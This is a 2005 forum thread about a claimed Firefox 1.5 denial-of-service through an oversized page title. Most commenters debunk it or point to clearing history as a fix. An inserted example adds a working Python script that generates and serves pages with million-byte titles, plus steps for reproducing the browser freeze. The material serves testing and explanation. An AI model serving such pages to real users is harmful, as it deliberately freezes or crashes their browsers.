packetstormsecurity.org — A simple DoS exploit for Firefox 1.5 was released today. All you have to do is create a simple webpage with the following code. Simply evil.
Dec 7, 2005
cryptocom Dec 7, 2005
Just set the number of days for Firefox to keep your browsing history to zero. Tools/Options/History...
cubsman44 Dec 8, 2005
Doesn't work, and why would you want to crash Firefox?
token Dec 8, 2005
hevnsnt, just a few things, and for everyone else worried about this.

1. JavaScript has NOTHING to do with this "vulnerability" (and yes, I use that term loosely). If it were possible to execute arbitrary code via this method, it could be done in a plain HTML file without any scripting, just by building a payload and pasting it into the HTML with the title tags wrapped around it.

2. There is NO buffer overflow. Nothing on the stack gets overwritten when visiting the site with large amounts of data in the title, nor does the stack of the Firefox instance get overwritten when you close and open the browser again. This is FALSE. hevnsnt, you should never have posted this without being sure. I am also sad to see it already made it to packetstormsecurity, which just shows how desperate people are to find new flaws.

When I first read this article I went to the Firefox site and checked to see if the vulnerability was on their site yet, but it wasn't, which kind of made me wonder if it wasn't some kind of hoax. Then I tested the vulnerability myself using two sets of code: a normal HTML file I called firefux.html and a Perl CGI I called firefux.cgi. I uploaded these files to a co-located machine I have and hit them both from Firefox 1.5 (Windows XP SP1) and from Firefox 1.5 (Gentoo 2005.1). Okay, and guess what the results were...

Well, in Windows I was surprised that even when hitting my code the browser rarely even lagged; CPU wasn't consumed all that much and it did not crash or freeze up at all!!! Even when I restarted the browser. Windows actually took it like a champ :-/

Now, when I hit the same code on my laptop running Gentoo (Linux for you nubs), Firefox lagged badly and even froze when I enlarged my buffers to around 1000000 bytes; the Firefox process actually became a zombie :-/ So my Linux box didn't take it all that well, BUT!!! there was no OVERFLOW on the stack!!!

This is false. There is no way to gain escalated privileges through this method on a remote machine. IT IS NOT POSSIBLE!!!!!! It isn't even a very good DoS; it's really sad and not even worth mentioning, but it was, so now it comes to this :-) I think it should be taken off of packetstormsecurity and other places. hevnsnt, you should also apologize to all the users of Digg, the Firefox developers, and the entire IT security community for being so silly!! Just one more time for you folks: THIS IS FALSE INFORMATION POSTED BY hevnsnt! FIREFOX IS NOT VULNERABLE USING THE METHOD PROVIDED BY HIM!!!!
token Dec 8, 2005
Okay, I forgot a little. The reason my Windows box took it better than my laptop with Linux is because my desktop running Windows has more memory and more CPU power, about 50% more of both than my Linux machine. Also, for people asking if this crashes IE too: NO, it wouldn't, and if it does it's not because IE handles history and history.dat (if IE even uses a history.dat) the same way Firefox does. Also, to people trying to compare IE to Firefox, well, all I have to say is FIREFOX IS AWESOME and IE is junk, period.

Also, anyone who thinks this should still be worth mentioning because, even though it can not execute arbitrary code on the Firefox user's machine, it can freeze, lag, or possibly crash a Firefox instance... well, so what?!? I mean, you could do this to ANY browser in a number of ways as long as you send enough JUNK to the user's browser; this could be in the title or in the body of the website or even a REALLY big image. This is useless, worthless information that actually did look promising from the post, but it isn't. This is NO threat to Firefox users, at least no more than to other browsers.
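A reproduction harness for the test token describes above (a static page with an oversized title, plus a CGI-style page whose title size can be dialled up), added here as an example. It is not the code from the packetstorm post and not token's firefux.html or firefux.cgi; the function names, the output file name, the port, the query parameters and the 1000000-byte default are assumptions. The script variant assumes the posted exploit set the title from JavaScript, which token's comment implies but the thread itself does not show; it is there so the two can be compared side by side.

```python
"""Test-page generator for the Firefox 1.5 oversized-<title> history DoS
discussed in the thread. Added example, not the posted exploit or token's
firefux.html / firefux.cgi; names, port and defaults are assumptions."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Roughly the buffer size at which token saw Firefox 1.5 on Gentoo freeze.
DEFAULT_TITLE_BYTES = 1_000_000


def build_title_page(title_bytes: int = DEFAULT_TITLE_BYTES, use_script: bool = False) -> str:
    """Return an HTML document whose title is `title_bytes` bytes of filler.

    use_script=False: the oversized title is plain markup (token's point:
    no JavaScript is needed, the browser records whatever title it parses).
    use_script=True: the static <title> stays short and document.title is
    set from a script instead (assumed shape of the posted code).
    """
    if title_bytes < 1:
        raise ValueError("title_bytes must be positive")
    filler = "A" * title_bytes
    if use_script:
        return (
            "<html><head><title>test</title></head><body>"
            f'<script>document.title = "{filler}";</script>'
            "</body></html>"
        )
    return f"<html><head><title>{filler}</title></head><body></body></html>"


def title_length(page: str) -> int:
    """Character length of the static <title> element in `page` (0 if absent)."""
    start = page.find("<title>")
    end = page.find("</title>", start)
    if start < 0 or end < 0:
        return 0
    return end - (start + len("<title>"))


class TitlePageHandler(BaseHTTPRequestHandler):
    """Stand-in for the CGI: ?bytes=N sets the title size, ?script=1 picks
    the JavaScript variant. Runs on the stdlib server, no Perl or httpd."""

    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        try:
            size = int(query.get("bytes", [DEFAULT_TITLE_BYTES])[0])
            use_script = query.get("script", ["0"])[0] == "1"
            body = build_title_page(size, use_script).encode()
        except ValueError:
            self.send_error(400, "bad bytes parameter")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8080) -> None:
    """Serve test pages on localhost only (assumed port)."""
    HTTPServer(("127.0.0.1", port), TitlePageHandler).serve_forever()


if __name__ == "__main__":
    # Static variant on disk (the firefux.html equivalent) ...
    with open("firefox_title_test.html", "w", encoding="utf-8") as f:
        f.write(build_title_page())
    # ... and the adjustable one: http://127.0.0.1:8080/?bytes=1000000&script=0
    serve()
```

To repeat token's comparison, load the page in the browser under test, close it, reopen it and time the restart, then do the same with `script=1` at the same `bytes` value; if both behave alike, the scripting is irrelevant, as token argues. Clearing history on exit (the setting cryptocom and gamingfox mention) should remove the restart effect, which is a quick way to confirm the title is what gets replayed from history.dat rather than something in the page itself.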
gamingfox Dec 8, 2005
It didn't crash my Firefox 1.5. It didn't even slow down the startup time for Firefox either. Of course, I already set privacy to auto-remove my history every time it shuts down. The whole point is that the results VARY depending on hardware, OS, and what configs your FF is set to.
underlok Dec 8, 2005
The results do not vary. It is a bug, period.
barbobot Dec 10, 2005
input type crash... buh bye, Explorer.